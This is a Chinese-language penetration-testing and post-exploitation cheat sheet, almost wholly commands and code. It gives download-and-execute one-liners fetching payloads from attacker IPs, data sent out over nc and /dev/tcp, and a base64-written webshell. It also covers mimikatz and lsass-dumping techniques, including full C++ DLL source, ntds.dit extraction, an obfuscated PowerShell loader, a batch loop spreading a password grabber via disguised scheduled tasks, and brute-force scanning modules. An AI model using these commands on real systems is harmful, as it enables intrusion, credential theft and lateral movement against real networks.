操作系统&内核版本&环境变量
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set
Root权限进程
>ps aux | grep root
>ps -ef | grep root
计划任务
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root
IP信息
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network
连接信息
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w
用户信息
>id
>whomi
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # 列出超级用户
>awk -F: '($3 == "0") {print}' /etc/passwd #列出超级用户
>cat /etc/sudoers
>sudo –l
操作记录
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
可写目录
>find / -writable -type d 2>/dev/null # 可写目录
>find / -perm -222 -type d 2>/dev/null # 可写目录
>find / -perm -o w -type d 2>/dev/null # 可写目录
>find / -perm -o x -type d 2>/dev/null # 可执行目录
>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # 可写可执行目录
HTTP服务
>python2 -m SimpleHTTPServer
>python3 -m http.server 8080
>php -S 0.0.0.0:8888
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
>openssl s_server -key key.pem -cert cert.pem -accept 443 –WWW
>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start"
>ruby -run -e httpd . -p 8888
文件操作
>cd /d E: && dir /b /s index.php
>for /r E:\ %i in (index*.php) do @echo %i
>powershell Get-ChildItem d:\ -Include index.php -recurse
Linux查找文件
#find / -name index.php
查找木马文件
>find . -name '*.php' | xargs grep -n 'eval('
>find . -name '*.php' | xargs grep -n 'assert('
>find . -name '*.php' | xargs grep -n 'system('
读文本文件:
>file = Get-Content "1.txt"
>file
>powershell Set-content "1.txt" "wocao"
&
>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"
压缩
>rar.exe a –k –r –s –m3 C:\1.rar C:\wwwroot
>7z.exe a –r –p12345 C:\1.7z C:\wwwroot
>rar.exe e c:\wwwroot\1.rar
>7z.exe x –p12345 C:\1.7z –oC:\wwwroot
>open 192.168.0.98 21
>输入账号密码
>dir查看文件
>get file.txt
#1.vbs
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2
>cscript 1.vbs
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2,13056//忽略HTTPS错误
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe"
ado.Close
JS
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe");
>cscript /nologo 1.js http://192.168.1.192/Client.exe
>bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "
Powershell
注意:内核5.2以下版本可能无效
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'
>powershell
>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'
3
>powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);
4
高版本
PS>iwr -Uri http://192.168.0.106:1222/111.txt -OutFile 123.txt –UseBasicParsing
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates
>Import-Module BitsTransfer
>$path = [environment]::getfolderpath("temp")
>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt"
>Invoke-Item "$path\ok.txt"
Certutil
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
对文件进行编码下载后解码执行
>base64 payload.exe > /var/www/html/1.txt # 在C&C上生成经base64编码的exe
>certutril -urlcache -split -f http://192.168.0.107/1.txt & certurl -decode 1.txt ms.exe & ms.exe
Python
#python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'
Perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://192.168.1.192/Client.exe", "1.exe");
PHP
#!/usr/bin/php
<?php $data = @file("http://192.168.1.192/Client.exe");
$lf = "1.exe";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>
Curl
#curl -o 1.exe http://192.168.1.192/Client.exe
#wget http://192.168.1.192/Client.exe
#wget –b后台下载
#wget –c 中断恢复
nc
>nc –lvnp 333 >1.txt
目标机
>nc –vn 192.168.1.2 333 <test.txt –q 1
&
>cat 1.txt >/dev/tcp/1.1.1.1/333
SCP
Linux中传输文件
>scp -P 22 file.txt user@1.1.1.1:/tmp
https://www.objectif-securite.ch/en/ophcrack
http://cracker.offensive-security.com/index.php
GoogleColab破解hash
之前在freebuf上看到过相关文章,最近在github上也看到了这个脚本,所以拿起来试试,速度可观
https://www.freebuf.com/geek/195453.html
https://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a
打开
https://drive.google.com/drive
新建一个文件夹,右键,更多选择google Colab
如果没有,点关联更多应用,搜索这个名字,安装一下即可
安装hashcat,下载字典
运行类型选择GPU加速
这里测试个简单密码
12亿条密码大概20多分钟
https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
以上是字典
密码策略
默认情况,主机账号的口令每30天变更一次
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters,键值为DisablePasswordChange,设置为1,即表示禁止修改账号口令
>组策略(gpedit.msc)中修改默认的30天,修改位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"设置为0时,表示无限长
>禁止修改主机账号口令,用来支持VDI (virtual desktops)等类型的使用,具体位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes"
Debug Privilege
本地安全策略>本地策略>用户权限分配>调试程序
Cmd
>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell
>Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter
>reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1
Getpass
>getpassword.exe>1.txt
QuarksPwDump
>QuarksPwDump.exe -dump-hash-local
MSF
Meterpreter > run hashdump
&
Meterpreter > mimikatz_command -f samdump::hashes
&
Meterpreter > load mimikatz
Meterpreter > wdigest
&
Meterpreter > load mimikatz
Meterpreter > msv
Meterpreter > kerberos
&
Meterpreter > load kiwi
Meterpreter > creds_all
&
Meterpreter > migrate PID
Meterpreter > load mimikatz
Meterpreter > mimikatz_command -f sekurlsa::searchPasswords
&
Meterpreter > run windows/gather/smart_hashdump
Empire
>usemodule credentials/mimikatz/dcsync_hashdump
Invoke-Dcsync
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync
抓明文
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
抓hash
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt
横向批量抓hash
把IP列表放入ip.txt文件中,通过一个账户密码批量net use与列表里的IP建立连接,如果建立连接没出错的话,复制getpass到目录temp目录,使用账户密码远程创建计划任务名字为windowsupdate,指定每日00:00以system权限执行getpass文件,创建完计划任务后,/tn是立刻执行此计划任务,执行完后删除此计划任务,ping -n 10>nul是程序停留,相当于延时10秒,之后复制文件到本地,接着删除getpass文件,删除创建的连接。
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U " administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\getpass.exe /F & net use \\%i\admin$ /del
Wmic
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
直接使用
>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
记录的结果在c:\windows\system32\mimilsa.log
>mimikatz log "privilege::debug" "lsadump::lsa /patch"
>mimikatz !privilege::debug
>mimikatz !token::elevate
>mimikatz !lsadump::sam
>powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
.net 2.0
katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727
Powershell执行
>$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
>$Content = [System.Convert]::FromBase64String($key)
>Set-Content key.snk -Value $Content –Encoding Byte
Cmd执行
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
.net 4.0 Msbuild
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml
>wmic os get /format:"mimikatz.xsl"
>wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"
Procdump64+mimikatz
>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
>procdump.exe -accepteula -ma lsass.exe lsass.dmp
>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"
Dumpert
https://github.com/outflanknl/Dumpert
有三种,分别是dll,可执行文件和cs的Aggressor插件,这里测试下dll和exe
DLL的执行方式是
rundll32.exe C:\Outflank-Dumpert.dll,Dump
文件保存在c:\windows\temp\dumpert.dmp
用mimikatz
>sekurlsa::mimidump c:\windows\temp\dumpert.dmp
>sekurlsa::logonpasswords
可执行文件就直接执行就可以了
https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e
将三个文件下载到本地,使用visual studio进行编译,需要修改了几个地方。
(1)添加如下代码
#pragma comment(lib, "Rpcrt4.lib") (引入Rpcrt4.lib库文件)
(2)将.c文件后缀改成.cpp (使用了c++代码,需要更改后缀)
(3) 编译时选择x64
编译得到exe文件
Visual studio创建c++空项目
配置类型选dll
字符集选Unicode,调试器选64位
Dll保存在C:\\windows\\temp\\1.bin
#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <string>
#include <map>
#include <TlHelp32.h>
#pragma comment(lib,"Dbghelp.lib")
using namespace std;
int FindPID()
{
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE) {
cout << "CreateToolhelp32Snapshot Error!" << endl;;
return false;
}
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult)
{
if (_wcsicmp(pe32.szExeFile, L"lsass.exe") == 0)
{
return pe32.th32ProcessID;
}
bResult = Process32Next(hProcessSnap, &pe32);
}
CloseHandle(hProcessSnap);
return -1;
}
typedef HRESULT(WINAPI* _MiniDumpW)(
DWORD arg1, DWORD arg2, PWCHAR cmdline);
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
ULONG Privilege, BOOL Enable,
BOOL CurrentThread, PULONG Enabled);
int dump() {
HRESULT hr;
_MiniDumpW MiniDumpW;
_RtlAdjustPrivilege RtlAdjustPrivilege;
ULONG t;
MiniDumpW = (_MiniDumpW)GetProcAddress(
LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
if (MiniDumpW == NULL) {
return 0;
}
// try enable debug privilege
RtlAdjustPrivilege(20, TRUE, FALSE, &t);
wchar_t ws[100];
swprintf(ws, 100, L"%hd%hs", FindPID(), " C:\\windows\\temp\\1.bin full");
MiniDumpW(0, 0, ws);
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
dump();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
>xxx.exe c:\xx\xx\xx.dll使用绝对路径
https://github.com/FSecureLABS/physmem2profit
mimikatz被多数安全人员用来获取凭据,但现在的AV/EDR很轻易的识别并查杀,这里不在服务器端使用mimikatz,远程对lsass进程进行转储。
服务器端直接使用visual studio构建
physmem2profit-public\server\
客户端
>git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
客户端这里先安装
>bash physmem2profit/client/install.sh
需要将此文件
https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys
传到目标服务器,我这里存放在c:\windows\temp\中
服务器端执行
>Physmem2profit.exe --ip 192.168.0.98 --port 8888 –verbose这里的IP是服务器端IP
攻击端安装所需模块
攻击端执行
>source physmem2profit/client/.env/bin/activate
>cd physmem2profit/client
>python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test
服务器端可以看到
把生成的dmp文件转移到win系统上使用mimikatz即可获得hash,当然也可以在linux上使用pypykatz。
再来一条转储lsass进程的命令
要以system权限执行
>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
位置C:\Program Files\Microsoft SQL Server\number\Shared
>tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID号
>Sqldumper.exe ProcessID PID 0x01100 导出mdmp文件
>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimipenguin
抓取linux下hash,root权限
https://github.com/huntergregal/mimipenguin
缓存hash提取
>reg save hklm\sam c:\sam.hive ® save hklm\system c:\system.hive ® save hklm\security c:\security.hive
>mimikatz.exe "lsadump::sam /system:sys.hive /sam:sam.hive" exit
#http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1
>powershell -exec bypass
>Import-Module .\invoke-ninjacopy.ps1
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
>Invoke-NinjaCopy –Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"
>quarks-pwdump.exe –dump-hash-domain
>ntdsutil
>snapshot
>activate instance ntds
>create
>mount {guid}
>copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit
>unmount {guid}
>delete {guid}
>quit
&
创建
> ntdsutil snapshot “activate instance ntds” create quit quit
挂载
> ntdsutil snapshot “mount {guid}” quit quit
复制
>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit
卸载并删除
> ntdsutil snapshot “unmounts {guid}” “delete {guid}” quit quit
删除后检测
> ntdsutil snapshot “List All” quit quit
提取hash
> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit
创建C盘卷影拷贝
>vssadmin create shadow /for=c:
复制ntds.dit
>copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit
删除拷贝
>vssadmin delete shadows /for=c: /quiet
Impacket
Impacket中的secretsdump.py
#impacket-secretsdump –system SYSTEM –ntds.dit LOCAL
或
#impacket-secretsdump –hashs xxx:xxx –just-dc xxx.com/admin\@192.168.1.1
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hive
https://github.com/zcgonvh/NTDSDumpEx
>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
>wmic /node:dc /user:P xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
>wmic /node:dc /user: xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
>copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive
C:\temp
PS >Import-Module .\VolumeShadowCopyTools.ps1
PS >New-VolumeShadowCopy -Volume C:\
PS >Get-VolumeShadowCopy
PS >Import-Module .\Copy-VSS.ps1
PS >Copy-VSS
PS >Copy-VSS -DestinationDir C:\ShadowCopy\
或MSF中
Meterpreter>load powershell
Meterpreter>powershell_import /root/Copy-VSS.ps1
Meterpreter>powershell_execute Copy-VSS
#lsadump::dcsync /domain:xxx.com /all /csv
或
#privilege::debug
#lsadump::lsa /inject
#use auxiliary/admin/smb/psexec_ntdsgrab
#set rhost smbdomain smbuser smbpass
#exploit
Ntds.dit文件存在/root/.msf4/loot
后渗透模块
#use windows/gather/credentials/domain_hashdump
#set session 1
https://github.com/AlessandroZ/LaZagne
>laZagne.exe all -oN获取所有密码输出到文件
Powershell
PS>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS>$vault = New-Object Windows.Security.Credentials.PasswordVault
PS>$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
>python3 laZagne.py all
使用Visual studio编译
>Seatbelt.exe ALL获取所有信息
>reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
http://www.cqure.net/wp/tools/password-recovery/vncpwdump/
解密
>vncpwdump.exe -k hash
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
离线破解
https://github.com/HyperSine/how-does-navicat-encrypt-password
>mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
X:\Foxmail\storage\xxx\Accounts\Account.rec0
使用
Foxmail Password Decryptor解密
https://securityxploded.com/foxmail-password-decryptor.php
https://www.nirsoft.net/password_recovery_tools.html
>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html"
或
>dir %appdata%\Mozilla\Firefox\Profiles\
>dir %appdata%\Mozilla\Firefox\Profiles\yn80ouvt.default
需先结束firefox.exe进程
压缩
>7z.exe -r -padmin123 a c:\users\public\firefox.7z C:\Users\Administrator\AppData\Roaming\Mozilla\*.*
https://github.com/unode/firefox_decrypt
https://securityxploded.com/firefox-master-password-cracker.php
SecureCRT
C:\Documents and Settings\Administrator\Application Data\VanDyke下的config文件夹
C:\program files\Vandyke software\securecrt\
https://github.com/uknowsec/SharpDecryptPwd
For+Ping命令查询存活主机
>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="
For+Ping命令查询域名对应IP
>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt
Windows
>nbtscan.exe -m 192.168.1.0/24
Linux
#nbtscan -r 192.168.0.0/24
#nmap -Pn -open -A -n -v -iL filename.txt
-Pn:跳过主机发现
-n:不做DNS解析
-open:只显示开启的端口
-A:扫描过程中,输入回车,可以查看扫描进度
-v:显示详细信息
-F:快速扫描100个常见端口
-p:选择要扫描的端口 例:-p1-65535 (全端口扫描,中间没有空格)
-iL:为程序指定一个要扫描的IP列表
-sV:探测开放端口的服务和版本信息
-T可以选择扫描等级,默认T3,但想快点话,可以输入 -T4
存活主机
>nmap -sP -PI 192.168.0.0/24
>nmap -sn -PE -T4 192.168.0.0/24
>nmap -sn -PR 192.168.0.0/24
meterpreter > background
msf > use auxiliary/server/socks4a
再配置proxychains.conf
#proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 内网IP
#netdiscover -r 192.168.0.0/24 -i wlan0
rp-scan
kali
>arp-scan --interface=wlan0 -localnet
Windows
>arp-scan.exe -t 192.168.0.0/24
#use auxiliary/scanner/discovery/arp_sweep
#use auxiliary/scanner/discovery/udp_sweep
#use auxiliary/scanner/netbios/nbname
meterpreter>run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24
meterpreter>run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24
常见端口
服务 | 端口 |
---|---|
Mssql | 1433 |
SMB | 445 |
WMI | 135 |
winrm | 5985 |
rdp | 3389 |
ssh | 22 |
oracle | 1521 |
mysql | 3306 |
redis | 6379 |
postgresql | 5432 |
ldap | 389 |
smtp | 25 |
pop3 | 110 |
imap | 143 |
exchange | 443 |
vnc | 5900 |
ftp | 21 |
rsync | 873 |
mongodb | 27017 |
telnet | 23 |
svn | 3690 |
java rmi | 1099 |
couchdb | 5984 |
pcanywhere | 5632 |
web | 80-90,8000-10000,7001,9200,9300 |
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 –T 4 -Ports '1-65535' -oA C:\TEMP.txt"
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"
去掉scanport就是探测存活
https://github.com/ShawnDEvans/smbmap
#use auxiliary/scanner/smb/smb_version查询开启139,445端口主机
#use auxiliary/scanner/smb/smb_login 爆破
#nmap -sU -sS --script smb-enum-shares.nse -p 445 192.168. 1.119
>for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445
端口一般139,弱口令连接
>smbclient -L 192.168.0.110
>smbclient '\\192.168.0.110\IPC$'
#use exploit/linux/samba/is_known_pipenamea
#use auxiliary/scanner/portscan/tcp
#use auxiliary/scanner/portscan/ack
#use auxiliary/scanner/ftp/ftp_version 开启FTP的机器
#use auxiliary/scanner/ftp/anonymous 允许匿名登录的FTP
#use auxiliary/scanner/ftp/ftp_login FTP爆破
#use auxiliary/scanner/http/http_version 开启HTTP服务的
#use auxiliary/scanner/smb/smb_version 开启SMB服务的
#use auxiliary/scanner/smb/smb_enumshares 允许匿名登录的SMB
#use auxiliary/scanner/smb/smb_login SMB爆破
#use auxiliary/scanner/ssh/ssh_version 开启SSH的机器
#use auxiliary/scanner/ssh/ssh_login SSH爆破
#use auxiliary/scanner/telnet/telnet_version 开启TELNET服务的
#use auxiliary/scanner/telnet/telnet_login TELNET爆破
#use auxiliary/scanner/mysql/mysql_version 开启MYSQL服务的
#use auxiliary/scanner/mysql/mysql_login MYSQL爆破
#use auxiliary/scanner/mssql/mssql_ping 开启SQLSERVER服务的
#use auxiliary/scanner/mssql/mssql_login MSSQL爆破
#use auxiliary/scanner/postgres/postgres_version开启POSTGRE服务的
#use auxiliary/scanner/postgres/postgres_login POSTGRESQL爆破
#use auxiliary/scanner/oracle/tnslsnr_version 开启oracle数据库的
#use auxiliary/admin/oracle/oracle_login Oracle数据库爆破
#use auxiliary/scanner/http/title 扫描HTTP标题
#use auxiliary/scanner/rdp/rdp_scanner 开启RDP服务的
#use auxiliary/scanner/http/webdav_scanner
#use auxiliary/scanner/http/http_put 开启WEBDAV的
#use auxiliary/scanner/smb/smb_ms17_010 存在17010漏洞的
#use auxiliary/scanner/http/zabbix_login zabbix爆破
#use auxiliary/scanner/http/axis_login axis爆破
#use auxiliary/scanner/redis/redis_login redis爆破
>nc -znv 192.168.0.98 1-65535
>nc -v -w 1 192.168.0.110 -z 1-1000
>for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done
$sudo apt-get install clang git gcc make libpcap-dev
$git clone https://github.com/robertdavidgraham/masscan
$cd masscan
$make
>masscan -p80,3389,1-65535 192.168.0.0/24
友好识别web服务
https://github.com/phantom0301/PTscan/blob/master/PTscan.py
>python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n(不ping)] [-b(开启banner扫描)] [-r查找IP]
